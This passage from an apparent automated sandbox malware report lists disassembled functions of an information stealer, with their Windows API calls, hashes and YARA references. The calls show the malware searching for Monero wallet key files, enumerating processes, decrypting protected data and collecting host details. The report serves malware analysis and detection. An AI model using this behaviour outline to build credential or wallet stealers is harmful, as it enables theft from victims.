Opcode ID: c48b78818de65fa11cf3b6020a218571619bf85ea1022db42761ba55bc5908fe
Instruction ID: 136a7c5290e3a6aa55efefcb7383c94035a0d01840497ec1d0c5d2251a1431fc
Opcode Fuzzy Hash: c48b78818de65fa11cf3b6020a218571619bf85ea1022db42761ba55bc5908fe
Instruction Fuzzy Hash: 3F413D71940218ABDB24DB94DC99BEEB3B8FF84700F204199E10A73291DB742F85CFA1

Function 0092E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00940D73), ref: 0092E4A2
StrCmpCA.SHLWAPI(?,009414F8), ref: 0092E4F2
StrCmpCA.SHLWAPI(?,009414FC), ref: 0092E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0092EBDF

Strings

\*.*, xrefs: 0092E44D

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 0cd3c0fcfc7e5c1b081bc738e55def6983fe2a2e8c323c8d064aedfa4be5bfb2
Instruction ID: 1244e1c1788193dc33612e871342a215e259dbd4d405b81fb740f6b0ce540fbd
Opcode Fuzzy Hash: 0cd3c0fcfc7e5c1b081bc738e55def6983fe2a2e8c323c8d064aedfa4be5bfb2
Instruction Fuzzy Hash: 37123172910118ABDB18FB60DC96FEE7378AFD4300F4045A9B54AA6191EF346F49CF92

Function 00939600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0093961E
Process32First.KERNEL32(00940ACA,00000128), ref: 00939632
Process32Next.KERNEL32(00940ACA,00000128), ref: 00939647
StrCmpCA.SHLWAPI(?,00000000), ref: 0093965C
CloseHandle.KERNEL32(00940ACA), ref: 0093967A

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: bdda154954ad97c0a0295bb97afa6ec6fb01f2c71af1916eef0b1e9c1531ab95
Instruction ID: 211be6c817ed013fda3e7edffaddda7042ef8497ea3537e3fa8cf08b80e6eead
Opcode Fuzzy Hash: bdda154954ad97c0a0295bb97afa6ec6fb01f2c71af1916eef0b1e9c1531ab95
Instruction Fuzzy Hash: 03010C75A01208ABCF14DFA5CD99BEDB7F8EB48304F104188E909A7290DBB8AF40DF51

Function 00938680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009405B7), ref: 009386CA
Process32First.KERNEL32(?,00000128), ref: 009386DE
Process32Next.KERNEL32(?,00000128), ref: 009386F3

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

CloseHandle.KERNEL32(?), ref: 00938761

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 93cca1786e3d8782148aebd74c733bd76ed6f7ce522cd54b00ef082601312851
Instruction ID: 9731a1bb8338f3673f9fcd833c87b638c8915252d79707b5937d07826f51fd2c
Opcode Fuzzy Hash: 93cca1786e3d8782148aebd74c733bd76ed6f7ce522cd54b00ef082601312851
Instruction Fuzzy Hash: 08314871901218ABCB24EF54DC95FEEB7B8EB85700F104199F10AB21A0DF746E45CFA2

Function 00937A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006FE568,00000000,?,00940E10,00000000,?,00000000,00000000), ref: 00937A63
RtlAllocateHeap.NTDLL(00000000), ref: 00937A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006FE568,00000000,?,00940E10,00000000,?,00000000,00000000,?), ref: 00937A7D
wsprintfA.USER32 ref: 00937AB7

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 30ea3a2706d5503f9e132b575568fd20b66b2d295e6c42ee24a7ff96f7667678
Instruction ID: d6e4e4cee07cedebf12a2f9b65477bf913c94cdb4d58d286f9421cb6b5b26417
Opcode Fuzzy Hash: 30ea3a2706d5503f9e132b575568fd20b66b2d295e6c42ee24a7ff96f7667678
Instruction Fuzzy Hash: F5115EB1945218EBEB208B94DC49FA9FB78FB44721F10479AE91AA32C0DB785E40CF51

Function 00929B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00929B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00929BA3
LocalFree.KERNEL32(?), ref: 00929BD3

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: ce79d73100c429d3ebd144ff57bc311260099528450ff64799e8086d06ec1a0b
Instruction ID: cf3d70346abebc4a8c1261ab5384fa343e9b3b183c81d04f8b7ef70eb7e3906b
Opcode Fuzzy Hash: ce79d73100c429d3ebd144ff57bc311260099528450ff64799e8086d06ec1a0b
Instruction Fuzzy Hash: 9111CCB8A00209DFDB04DF94D989AAE77B9FF88300F104568E915A7394D774AE10CFA1

Function 009378E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937910
RtlAllocateHeap.NTDLL(00000000), ref: 00937917
GetComputerNameA.KERNEL32(?,00000104), ref: 0093792F

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 4e9b404d21d6c6e0828150971511fc7249e9c75061fdbcd78e72ab75a5e9a5c9
Instruction ID: a4df44b8b3d3da729f416243b986f2d38fdad256dc7aad56b3c0e6ff855b81d1
Opcode Fuzzy Hash: 4e9b404d21d6c6e0828150971511fc7249e9c75061fdbcd78e72ab75a5e9a5c9
Instruction Fuzzy Hash: 690186B1904204EBDB10DF94DD45BAAFBBCF744B21F104219FA45E72C0D77859008FA2

Function 00937850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009211B7), ref: 00937880
RtlAllocateHeap.NTDLL(00000000), ref: 00937887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0093789F

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 53ddb4522fdc10bd1f4e55446efe80fc84b697ab0437666c15619c5486fee251
Instruction ID: 6bbffc2f01b3df1dbd291c50d3f186b7fd2d4c9289f413cfc5c70929106b5750
Opcode Fuzzy Hash: 53ddb4522fdc10bd1f4e55446efe80fc84b697ab0437666c15619c5486fee251
Instruction Fuzzy Hash: C8F04FB1944209ABCB10DF98DD49BAEFBB8EB48711F10065AFA05A36C0C7B819048FA1

Function 00921160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0092116A
ExitProcess.KERNEL32 ref: 0092117E

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
